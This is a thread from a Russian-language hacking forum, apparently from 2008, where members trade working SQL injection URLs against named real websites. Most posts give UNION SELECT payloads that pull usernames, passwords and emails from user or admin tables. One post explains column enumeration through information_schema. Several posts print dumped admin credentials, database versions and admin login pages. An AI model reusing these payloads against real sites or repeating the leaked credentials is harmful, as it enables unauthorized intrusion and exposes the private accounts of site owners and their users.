HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.05.2008, 00:57
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

2 dizn ti limit poiuzai i vibirai sam columns kakie tebe nujni...no obi4o id, name, pass ili username,password,login etc.....zapros delae6 primerno takoi
http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 , 16,column_name,18+from+information_schema.columns+ where+table_name=(tablitza kotoraya interesuet)+li mit+1,1/* dalshe igraisea limitom meneay zna4enie pervoi tzifri
 
Ответить с цитированием

  #2  
Старый 10.05.2008, 01:01
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

щя заюзаем
 
Ответить с цитированием

  #3  
Старый 10.05.2008, 01:04
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

imea tablitzi vozmojno nado budet v sql hex peredelivati http://x3k.ru/ tut naide6....vse prosto
 
Ответить с цитированием

  #4  
Старый 10.05.2008, 14:10
†c0(aIn?†
Новичок
Регистрация: 04.05.2008
Сообщений: 16
Провел на форуме:
209786

Репутация: 45
По умолчанию

http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--

atmmarketplace@localhost
sitedb
5.0.22

http://www.fastcasual.com/research.php?rc_id=4+uni on+select+1,2,3,4,5--
atmmarketplace@localhost
sitedb
5.0.22
 
Ответить с цитированием

  #5  
Старый 10.05.2008, 18:34
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://www.pharma-id.com/thedirectory/profile.asp?id=1+or+1=(SELECT+TOP+1+pName+from+tblWebsiteUsers)--
так же можно подставить: pPassword, pEmail, pName

Код:
http://www.zaishu.com/shop.php?id=-17+union+select+1,2,3,username,password,6,7,8,9,10,11,12,13,14+from+adminrights/*
admin:zaishu62
 
Ответить с цитированием

  #6  
Старый 10.05.2008, 19:27
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

www.worgas.it
Цитата:
http://www.worgas.it/products.php?id=-13+union+select+concat_ws(0x3a,username,password,e mail_address),2,3+from+clienti/*
http://www.worgas.it/products.php?id=-13+union+select+concat_ws(0x3a,username,password,e mail_address),2,3+from+rc_users/*
===============================================
scuoladott.psy.unipd.it
Цитата:
http://scuoladott.psy.unipd.it/news.php?id=-12+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,password),9,0,1,2,3+from+percez_cal_users/*
http://scuoladott.psy.unipd.it/news.php?id=-12+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,usern ame,password),9,0,1,2,3+from+pscbio_cal_users/*
это вроде админы - но где админка - ???
admin:adm1n
campana:g1anlu
agrillo:chragri

===============================================
Цитата:
http://www.freeinfosociety.com/site.php?postnum=460'+and+1=0+union+select+1,2,con cat(name,0x3a,password),4+from+users/*

Последний раз редактировалось 159932; 10.05.2008 в 19:29..
 
Ответить с цитированием

  #7  
Старый 10.05.2008, 20:37
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.pro-science.asm.md/?lang=ro&view_ev&ev=-90+union+select+1,2,3,4,5,6,7 ,8,9 /*

version() -5.0.32-Debian_7etch5
database()-proscience
user()-
proscience@localhost

dal6e bilo v lom razvivat'....
 
Ответить с цитированием

  #8  
Старый 10.05.2008, 20:40
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


По умолчанию

http://www.vreaucredit.md/test/bank_info.php?bank_id=-99999+union+select+1,2,3,4,5,6 ,7,8,9,0/*
user()-17447@localhost
version () -5.0.27
database() -17447
information_schema.tables prisutstvuet...
 
Ответить с цитированием

  #9  
Старый 10.05.2008, 21:17
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
По умолчанию

http://www.millennium.net.ua/catalog/?id=-1+union+select+concat(name,':',passwd)+from+users+ limit+0,1/*
http://www.millennium.net.ua/admin/login.php
artem:vfkmdbyf
 
Ответить с цитированием

  #10  
Старый 10.05.2008, 22:21
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.eastsidehockeymanager.net/news.php?view=news&gid=24&id=1261+and+1=2+union+all+select+1,2,concat(user,char(58),password),null,5,null,null,null,null,null,11,null,13,null+from+mysql.user--
Код:
http://www.bccracunari.com/katalog/detail.php?id=968+and+1=2+union+all+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12+from+user--
Код:
http://job.zp.ua/vip.php?id=2+and+1=2+union+all+select+1,2,3,4,concat(login,char(58),passw),6,7+from+admin--
Код:
http://www.iteforum.com/sell.php?id=179182+and+1=2+union+all+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11,12,13,14+from+users--

Последний раз редактировалось SWAT; 10.05.2008 в 22:33..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.